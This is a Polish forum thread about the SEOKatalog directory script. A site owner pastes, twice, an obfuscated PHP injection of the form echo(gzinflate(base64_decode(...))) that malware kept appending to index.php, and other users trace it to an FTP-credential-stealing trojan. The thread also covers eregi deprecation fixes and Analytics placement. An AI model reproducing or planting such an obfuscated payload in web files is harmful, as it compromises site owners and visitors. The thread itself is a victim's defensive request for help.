Skocz do zawartości

[startup] SEOKatalog

Rekomendowane odpowiedzi

Znowu się coś zrobiło na serwerze do pliku index dokleja się taki kod

#d93065#

echo(gzinflate(base64_decode("tVVNc5swEP0t5WKoBxcJ9MEo6qE59dwj44MHY2czjnGB2pNk8t+7WoFjJ9jNdCYDYlbS6u3b1RO

6acsGdt330qYxM2BjPi0NrMLdommrn9suDJJgGjBsHFsaRNZanUZd8/j8o6431WIbRkWwa+qu7h53VTCf/X4pF115F1br6rBul9Ezoh1gu6wPs2Vd/nmotl20ssUkThm4JgVIDrGGBGQCioHIQSmQOUgGCkck4JNSTwLHYe3s03klgEvQDLIMhHLOqSaDfBKIE

VQ7aAyAXtjFAQbok6KlU4i5goHPKyeVvYKgnaAvy898tXDEHRvtSKCB3TG8i4mp3EFjPNcjrphjMkIgpg

huJAdOOciMcseXA8NZfCSNujX0oqG5C5K5wIoIMDIpOiMCnIC4Q3Qxcort2WV9pBxL5adxSPrypH38tx6

KUtGs3yY/rTSlKNxXkC11nzR6Mo9LYd1L1cFKIylHVwzlEdRNnD9mJnwsX3vV148d5cEpQ9wNQpK0lB8HkBPnrtBq

pNQ4g7swutknXbeIKinyM3axviyfEWkoSgbn3To6B9xX+qJkhJcMo3WU9eihINmP6Ij5zCQJQwzHSgxay

vo9OpaUcI7SQzv7HPGdsTqVkPyHfI6n4Y2C4muIF6TlsS6p6xriqew8ir7OYJDkuPMHt+X8tA6b05/G/wB8f77HMD/+e/u8/7Yk+XOSEOGhD9LqZUDnJ3HJjxzjybxI5rN2t4EunMAkMnsbVHu83hbYNoF5wRtrH1XW31rFfm4OdmVaW

8xNY391DWzXZlU3oRFSfLFgYGpZ9HyPVmvbaVMEK8RpsNUPt/i9Wzj7tl7i7Rgeivv5VzbNkqgP82Rb4+OFT5G5+dbfx38B")));

#/d93065#

na samym początku nie wiem z kąd on może się tak pojawiać

Witam

Gdy zminiłem skutke seokataloga pojawiły sie na górze seoka następujace komunikaty

Deprecated: Function eregi() is deprecated in /home/.../public_html/templates/wup/home.php on line 1

Deprecated: Function eregi() is deprecated in /home/.../public_html/templates/wup/header.php on line 1

Deprecated: Function eregi() is deprecated in /home/...../public_html/templates/wup/header.php on line 17

Ja juz nie mam pomysłu czym jest to spowodowane, moze ktor z forumowiczów wie w czym rzecz.

Przypominam że problemy techniczne lepiej zgłaszać na kontakt@seokatalogi.pl

czy zdażyło się wam coś takiego The file /home/xxxxxx/domains/xxxxxxxxxxx.pl/public_html/index.php is corrupted.

czy to wina templatki z dołaczonymi skryptami jqery

Masz jakieś syfa. Wgraj plik index.php z paczki instalacyjnej a następnie zmień dane do FTPa i przeskanuj dokładnie komputer.

Witam

Gdy zminiłem skutke seokataloga pojawiły sie na górze seoka następujace komunikaty

Deprecated: Function eregi() is deprecated in /home/.../public_html/templates/wup/home.php on line 1

Deprecated: Function eregi() is deprecated in /home/.../public_html/templates/wup/header.php on line 1

Deprecated: Function eregi() is deprecated in /home/...../public_html/templates/wup/header.php on line 17

Ja juz nie mam pomysłu czym jest to spowodowane, moze ktor z forumowiczów wie w czym rzecz.

Masz włączony PHP 5.3 ale nie dostosowane pliki templatki więc albo poproś hostingodawcę o powrót do PHP 5.2 albo w templates/nazwa-templatki/ we wszystkich plikach zamień:

<? if (!eregi('templates/', $_SERVER[SCRIPT_FILENAME])) : ?>

na:

<? if (!preg_match('#templates/#i', $_SERVER[SCRIPT_FILENAME])) : ?>

Edytowane przez General_Depet

iDir - skrypt na katalog stron lub firm - następca projektu SEOKatalog, dostosowany do dzisiejszych standardów, w pełni responsywny, na nowoczesnym frameworku.

Zrobione najlepsze żę ESET NOD nic nie znalazł a kacperski całą lawinę był to trojan .js ale na wszelki wypadek zmieniłem hasła dodam że w historii był taki przypadek ale tam były zapamiętane hasła w total commander i do plików index.php dodawał się taki oto kod :

#d93065#

echo(gzinflate(base64_decode("tVVNc5swEP0t5WKoBxcJ9MEo6qE59dwj44MHY2czjnGB2pNk8t+7WoFjJ9jNdCYDYlbS6u3b1RO

6acsGdt330qYxM2BjPi0NrMLdommrn9suDJJgGjBsHFsaRNZanUZd8/j8o6431WIbRkWwa+qu7h53VTCf/X4pF115F1br6rBul9Ezoh1gu6wPs2Vd/nmotl20ssUkThm4JgVIDrGGBGQCioHIQSmQOUgGCkck4JNSTwLHYe3s03klgEvQDLIMhHLOqSaDfBKIE

VQ7aAyAXtjFAQbok6KlU4i5goHPKyeVvYKgnaAvy898tXDEHRvtSKCB3TG8i4mp3EFjPNcjrphjMkIgp

g

huJAdOOciMcseXA8NZfCSNujX0oqG5C5K5wIoIMDIpOiMCnIC4Q3Qxcort2WV9pBxL5adxSPrypH38tx

6

KUtGs3yY/rTSlKNxXkC11nzR6Mo9LYd1L1cFKIylHVwzlEdRNnD9mJnwsX3vV148d5cEpQ9wNQpK0lB8HkBPnrtBq

pNQ4g7swutknXbeIKinyM3axviyfEWkoSgbn3To6B9xX+qJkhJcMo3WU9eihINmP6Ij5zCQJQwzHSgxa

y

vo9OpaUcI7SQzv7HPGdsTqVkPyHfI6n4Y2C4muIF6TlsS6p6xriqew8ir7OYJDkuPMHt+X8tA6b05/G/wB8f77HMD/+e/u8/7Yk+XOSEOGhD9LqZUDnJ3HJjxzjybxI5rN2t4EunMAkMnsbVHu83hbYNoF5wRtrH1XW31rFfm4OdmVaW

8xNY391DWzXZlU3oRFSfLFgYGpZ9HyPVmvbaVMEK8RpsNUPt/i9Wzj7tl7i7Rgeivv5VzbNkqgP82Rb4+OFT5G5+dbfx38B")));

#/d93065#

Nie wiem jak u mnie do tego mogło dojść bo używam FileZilla Client ale cóż już po kłopocie.

Podziękować chciałbym Maksiu86 za szybko pomoc.

I znowu zacząłem myśleć o przesiadce z Windowsa na jakiegoś Linuksa chociaż do pracy.

Nie rozumiem po co te oskarżanie Windowsa za całe zło. ;)

Aktualizowany Windows z darmową ochroną + myślący użytkownik = 0 problemów. Osobiście nie miałem problemów z doklejanymi iframe i javascriptami.

Cześć a ja mam takie pytania.

CYTAT(Iran @ 3.04.12 - 22:43)

Witaj mam pytania

1.Jakie są "parametry zapytania" w seokatalogu?

Chodzi o zapytania SQL ?

2. W którym okienku statystyk umieścić kod GA i czy muszę umieszczać go na więcej niż tej jednej stronie?

Wystarczy w PA. A pole to chyba "kod przed </body></html>"

4.Czy da się się przenieść umiejscowienie kategorii które są na środku strony, całkowicie na prawo ? ( coś jak są reklamy tu z prawej strony na forum )

Da się ale to robota dla grafika.

1. chodzi o parametry do google analitycs

2.kod mam umieścić na koncu sekcji </head>

4.Własnie grafik mi mówi że nie bo autor skryptu je tam umieścił i można tylko zdublować gdzieś na stronie, nie bardzo kumam .Chodzi mi o to czy w edytorze nie da się zmienić jakiś parametrów które pozwolą zmienić ich miejsce w inny obszar strony?

;)

Reklama w internecie - baza firm - katalog firm + seomaster script

4.Czy da się się przenieść umiejscowienie kategorii które są na środku strony, całkowicie na prawo ? ( coś jak są reklamy tu z prawej strony na forum )

Da się ale to robota dla grafika.

4.Własnie grafik mi mówi że nie bo autor skryptu je tam umieścił i można tylko zdublować gdzieś na stronie, nie bardzo kumam .Chodzi mi o to czy w edytorze nie da się zmienić jakiś parametrów które pozwolą zmienić ich miejsce w inny obszar strony?

:D

może to pomoże https://szablonyseo.pl/107/kategorie-w-panelu-bocznym/

czy tak trudno zainstalować chociażby darmowego avasta?
I znowu zacząłem myśleć o przesiadce z Windowsa na jakiegoś Linuksa chociaż do pracy.

Zapisuj dalej hasła w Total Commanderze i obwiniaj M$ :D

Mam oryginalnego ESET NOD jak i Windowsa

Trzeba czytać w całości

Napisałem

Nie wiem jak u mnie do tego mogło dojść bo używam FileZilla Client ale cóż już po kłopocie.

Pozdrawiam

Edytowane przez poziom